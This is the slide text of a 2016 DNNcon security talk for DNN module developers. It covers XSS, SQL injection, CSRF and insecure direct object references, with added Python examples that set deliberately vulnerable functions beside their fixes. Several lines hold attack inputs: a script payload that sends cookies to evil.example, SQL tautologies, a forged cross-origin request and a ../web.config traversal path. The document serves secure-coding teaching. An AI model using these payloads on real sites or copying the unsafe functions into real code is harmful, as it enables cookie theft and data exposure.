DNNcon 2016: Are There Security Flaws in Your DNN Modules?
@DNNCon  Don't forget to include #DNNCon in your tweets!
Joshua Bradley / Web Developer
Engage Software
@JRBradley1
Thanks to all of our generous sponsors!
Agenda
• Introduction
• Cross Site Scripting
• SQL Injection
• Cross Site Request Forgery
• Insecure Direct Object References
• Q & A
Goal
For Developers
- To think about possible security vulnerabilities while developing your modules.
For Everyone
- Be able to recognize potential vulnerabilities when testing websites.
Introduction
Cross Site Scripting
Reflected XSS
Reflected XSS Example
Stored XSS
Stored XSS Example
XSS Summary
• HTML-encode user-supplied values at output time whenever the field does not need to carry HTML. Encode for the context you render into (HTML body, attribute, JavaScript, URL); encoding at input time is not enough, because the same stored value is often rendered in more than one place.
• When the module must accept HTML from users (rich-text editors, comments), run it through an anti-XSS sanitizer that allow-lists tags and attributes. Blacklisting <script> is not a defence: event-handler attributes, javascript: URLs and malformed markup get past it.
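The two XSS rules above, shown as runnable code. This is an added example written for this page, not code from the talk; the slides carry no code, and the talk's own setting is a C#/ASP.NET DNN module, so Python's standard library stands in here. The reflected case is a search box that echoes the query string; the stored case is a comment field that must keep some HTML. The payloads, the allowed tag set and the function names are constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed payloads of the kind a tester submits in a search box (reflected)
# or a comment field (stored). Test data, not from the slides.
REFLECTED_PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
STORED_PAYLOAD = ('<a href="javascript:alert(1)" onmouseover="alert(2)">click</a>'
                  '<img src=x onerror=alert(3)>')


def render_search_unsafe(term: str) -> str:
    # Vulnerable: the query-string value is written straight into the page.
    return "<p>Results for: " + term + "</p>"


def render_search_safe(term: str) -> str:
    # Fixed: HTML-encode at output time. The browser shows the text, never runs it.
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


class AllowListSanitizer(HTMLParser):
    """Allow-list sanitizer for fields that must carry some HTML (the 'anti-XSS
    library' case). Only the listed tags/attributes survive and links must be
    http(s); script/style bodies, event handlers and javascript: URLs are dropped."""
    ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(), "a": {"href"}}
    VOID = {"br"}
    DROP_BODY = {"script", "style"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skipping = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP_BODY:
            self._skipping += 1          # swallow the element's text too
            return
        if tag not in self.ALLOWED:
            return                       # unknown tag: dropped, its text is kept
        kept = ""
        for name, value in attrs:
            if name not in self.ALLOWED[tag] or value is None:
                continue                 # drops onmouseover, onerror, style, ...
            if name == "href" and urlparse(value).scheme not in ("http", "https"):
                continue                 # blocks javascript:, data:, vbscript: ...
            kept += ' %s="%s"' % (name, html.escape(value, quote=True))
        self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in self.DROP_BODY:
            self._skipping = max(0, self._skipping - 1)
        elif tag in self.ALLOWED and tag not in self.VOID:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skipping:
            self.out.append(html.escape(data, quote=True))


def sanitize_html(fragment: str) -> str:
    """Return the fragment with only allow-listed markup; text is re-encoded."""
    p = AllowListSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)
```

The sanitizer is deliberately small, to show the allow-list principle: anything not explicitly permitted is removed rather than "escaped if it looks dangerous". For production, use a maintained sanitizer library; tag and URL allow-lists are the easy part, and the hard part is staying current with parser quirks.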
SQL Injection
SQLi Example
SQLi Summary
• Never build SQL by string concatenation with user input. Escaping quotes by hand is not a fix: numeric and identifier contexts need no quote to break out of.
• Use an ORM, or parameterized queries and parameterized stored procedures, so that user data is bound as a typed parameter and the statement text stays constant. A stored procedure that builds dynamic SQL from its arguments and EXECs it is still injectable.
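Concatenation beside the parameterized fix, run against a real database so the injection can be observed rather than described. This is an added example for this page, not code from the talk: Python's sqlite3 module stands in for SQL Server and the DNN data layer, and the Items table, its rows and the attacker strings are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for a module's items. The draft row
    and the other portal's row must never come back from a portal-0 search."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Items (ItemId INTEGER PRIMARY KEY, Title TEXT, "
                 "PortalId INTEGER, IsPublished INTEGER)")
    conn.executemany("INSERT INTO Items VALUES (?, ?, ?, ?)", [
        (1, "Welcome", 0, 1),
        (2, "Board minutes (draft)", 0, 0),
        (3, "Welcome", 1, 1),
    ])
    return conn


def search_unsafe(conn, portal_id: int, title: str):
    # Vulnerable: the search text is pasted into the statement, so a quote in it
    # ends the literal and whatever follows is parsed as SQL.
    sql = ("SELECT ItemId, Title FROM Items WHERE PortalId = " + str(portal_id)
           + " AND IsPublished = 1 AND Title = '" + title + "'")
    return conn.execute(sql).fetchall()


def search_safe(conn, portal_id: int, title: str):
    # Fixed: the statement text is constant and values are bound as parameters,
    # the same idea as a parameterized stored procedure or an ORM query.
    sql = ("SELECT ItemId, Title FROM Items "
           "WHERE PortalId = ? AND IsPublished = 1 AND Title = ?")
    return conn.execute(sql, (portal_id, title)).fetchall()


def get_item_unsafe(conn, item_id: str):
    # Vulnerable without any quote at all: a numeric context needs no ' to
    # break out of, so "escape the quotes" is not a fix.
    return conn.execute("SELECT ItemId, Title FROM Items WHERE ItemId = "
                        + item_id).fetchall()


def get_item_safe(conn, item_id: str):
    # Fixed: validate the type, then bind. Non-numeric input yields no rows.
    if not item_id.strip().isdigit():
        return []
    return conn.execute("SELECT ItemId, Title FROM Items WHERE ItemId = ?",
                        (int(item_id),)).fetchall()


# Constructed attacker inputs.
TAUTOLOGY = "x' OR 'a'='a"      # closes the literal and ORs in an always-true test
NUMERIC_TAUTOLOGY = "2 OR 1=1"  # no quote needed in a numeric comparison
```

With the tautology, the concatenated query becomes `... AND Title = 'x' OR 'a'='a'`; AND binds tighter than OR, so the portal and published filters are bypassed and every row comes back. The parameterized version treats the whole string as a title and returns nothing.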
Cross Site Request Forgery
CSRF Example
CSRF Summary
• Use HttpPost: restrict every state-changing action to POST. A GET that changes data can be triggered by an <img> tag or a link on any site the user visits.
• ValidateAntiForgery: require and validate an anti-forgery token on every state-changing request. The browser sends the victim's cookies automatically, but an attacker's page cannot read or mint the token.
• Never allow access from any host: do not open your module's service endpoints to requests from arbitrary origins; accept only your own site's origin.
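The three CSRF rules as one request handler, with a forged and a legitimate request to run through it. This is an added example, not the talk's code and not ASP.NET's anti-forgery implementation: the token here is a simplified stand-in (an HMAC of the session id under a server secret) that shows the property the real attribute gives you, and the "any host" point is interpreted as an Origin/Referer check against the site's own origin. Requests are plain dicts; the origin, secret and field names are assumptions.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # assumption: would come from site config, not be regenerated per run
SITE_ORIGIN = "https://www.example.com"   # assumption: the site's own origin


def issue_token(session_id: str) -> str:
    """Anti-forgery token bound to the session, rendered into the page's form
    (or a header for AJAX). An attacker's page cannot read it: same-origin policy."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id: str, token: str) -> bool:
    # Constant-time comparison; a token minted for another session fails.
    return bool(token) and hmac.compare_digest(issue_token(session_id), token)


def same_origin(headers: dict) -> bool:
    # Browsers attach Origin to cross-site POSTs (Referer is the fallback).
    # Accept only our own origin, never "any host". A missing header is rejected.
    source = headers.get("Origin") or headers.get("Referer") or ""
    return source == SITE_ORIGIN or source.startswith(SITE_ORIGIN + "/")


def delete_item(request: dict):
    """A state-changing module action. `request` is a constructed dict with
    method, headers, session_id (from the auth cookie) and form fields.
    Returns (status, message)."""
    if request["method"] != "POST":
        return 405, "state changes only via POST"            # slide: Use HttpPost
    if not same_origin(request["headers"]):
        return 403, "cross-origin request rejected"          # slide: never any host
    if not token_valid(request["session_id"],
                       request["form"].get("__RequestVerificationToken", "")):
        return 403, "missing or invalid anti-forgery token"  # slide: ValidateAntiForgery
    return 200, "item %s deleted" % request["form"]["itemId"]


def forged_request(victim_session: str) -> dict:
    """What arrives when the victim visits the attacker's auto-submitting form:
    the browser adds the victim's session cookie, but there is no token and the
    Origin is foreign."""
    return {"method": "POST", "headers": {"Origin": "https://evil.example"},
            "session_id": victim_session, "form": {"itemId": "42"}}


def legit_request(session_id: str) -> dict:
    """The same action submitted from the site's own page."""
    return {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
            "session_id": session_id,
            "form": {"itemId": "42",
                     "__RequestVerificationToken": issue_token(session_id)}}
```

Each check fails a different forgery: the method check stops `<img src="...?itemId=42">`, the token check stops a form posted from another site (the attacker can log in and obtain a token for their own session, but it will not validate against the victim's), and the origin check is the belt to the token's braces. Rejecting a missing Origin and Referer is a trade-off; some privacy tools strip Referer, so the token must remain the primary control.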
Insecure Direct Object References
IDOR Example
IDOR Summary
• Use the built-in Folder and File Manager (DNN's file-system API) instead of reading from disk yourself, so that folder permissions are checked for you.
• Avoid using user input (a path, file name or raw id) to select the file to serve. If the user must choose, resolve the choice against a server-side list of files the current user is authorized to see, and reject anything not on that list, including entries that resolve outside the intended folder.
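A file-download handler in its IDOR form and its fixed form, run against a throw-away folder. This is an added example, not the talk's code and not DNN's FileManager API: a small in-memory registry plays the role of the file table behind the built-in file manager, the directory layout under a temp folder is constructed to mimic a site root with a web.config above the uploads area, and users, ids and file contents are invented for the test.

```python
import os
import tempfile

# Constructed site layout in a temp folder (never cleaned up; it is a demo):
# SITE_ROOT plays the web root and UPLOADS the per-user file area below it.
SITE_ROOT = tempfile.mkdtemp()
UPLOADS = os.path.join(SITE_ROOT, "Portals", "0", "uploads")

# Server-side registry: an opaque id maps to a relative path *and* an owner.
# Entry 3 is deliberately poisoned to show the containment check below.
FILES = {
    1: {"path": "alice/report.pdf", "owner": "alice"},
    2: {"path": "bob/salary.xlsx", "owner": "bob"},
    3: {"path": "../../../web.config", "owner": "alice"},
}


def _setup():
    for rel, data in [("alice/report.pdf", b"alice report"),
                      ("bob/salary.xlsx", b"bob salary")]:
        full = os.path.join(UPLOADS, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)
    with open(os.path.join(SITE_ROOT, "web.config"), "wb") as f:
        f.write(b"<connectionStrings>secret</connectionStrings>")


_setup()


def download_unsafe(path: str) -> bytes:
    # Vulnerable: ?file=... selects the file. There is no ownership check and no
    # containment, so bob/salary.xlsx and ../../../web.config are one request away.
    with open(os.path.join(UPLOADS, path), "rb") as f:
        return f.read()


def download_safe(user: str, file_id: int):
    """Fixed: the client sends an id, the server resolves it, checks the owner,
    and refuses anything that resolves outside UPLOADS. Returns (status, bytes)."""
    entry = FILES.get(file_id)
    if entry is None or entry["owner"] != user:
        return 404, b""        # same answer for missing and foreign ids: no enumeration hint
    root = os.path.realpath(UPLOADS)
    full = os.path.realpath(os.path.join(root, entry["path"]))
    if os.path.commonpath([root, full]) != root:
        return 403, b""        # registry entry (or symlink) escapes the root folder
    with open(full, "rb") as f:
        return 200, f.read()
```

Two separate controls are at work: the authorization lookup (is this id one of *this user's* files?) fixes the IDOR, and the realpath/commonpath containment fixes traversal even if the registry itself is ever corrupted. Neither replaces the other.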
Available on GitHub & Slideshare
• http://www.engagesoftware.com/blog
Questions
@JRBradley1
Resources
• https://www.owasp.org/index.php/OW
• http://www.dnnsoftware.com/wiki/analysis-of-dotnetnuke-compliance-against-owasp-top-10-2013
• http://www.troyhunt.com/2012/12/sto
• https://www.owasp.org/index.php/Ma
• http://www.jwaffinityit.com/Portals/28
• https://msdn.microsoft.com/en-us/libr aspx
• https://weblog.west-wind.com/posts/2012/Ju
• http://www.computerweekly.com/tip/Cross-site-request-forgery-Lessons-from-a-CSRF-attack-example
• http://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
• https://www.sql-programmers.com/sql-injection.aspx
• https://msdn.microsoft.com/en-us/library/bb386929.aspx
• https://msdn.microsoft.com/en-us/library/cc716760.aspx
• http://www.troyhunt.com/2013/07/everything-you-wanted-to-know-about-sql.html
• https://github.com/malcomvetter/WidgetSender